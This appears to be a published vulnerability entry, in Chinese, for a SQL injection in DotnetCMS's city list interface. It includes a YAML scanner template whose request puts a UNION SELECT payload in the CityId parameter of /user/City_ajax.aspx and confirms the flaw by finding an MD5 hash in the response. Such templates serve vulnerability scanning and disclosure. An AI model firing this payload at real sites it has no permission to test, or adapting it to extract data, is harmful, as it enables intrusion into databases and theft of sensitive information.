漏洞描述
DotnetCMS 城市列表接口存在SQL注入漏洞,攻击者可以通过构造恶意请求,执行任意SQL语句,从而获取数据库中的敏感信息。
dotnetcms-sqli: DotnetCMS sqli
PoC代码[已公开]
id: dotnetcms-sqli
info:
name: DotnetCMS sqli
author: unkown
severity: high
description: |-
DotnetCMS 城市列表接口存在SQL注入漏洞,攻击者可以通过构造恶意请求,执行任意SQL语句,从而获取数据库中的敏感信息。
tags: dotnetcms,sqli
created: 2023/06/23
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(1, 100)
rules:
r0:
request:
method: GET
path: /user/City_ajax.aspx
expression: response.status == 200
r1:
request:
method: GET
path: /user/City_ajax.aspx?CityId={{r2}}'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{r1}}')),2--
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
expression: r0() && r1()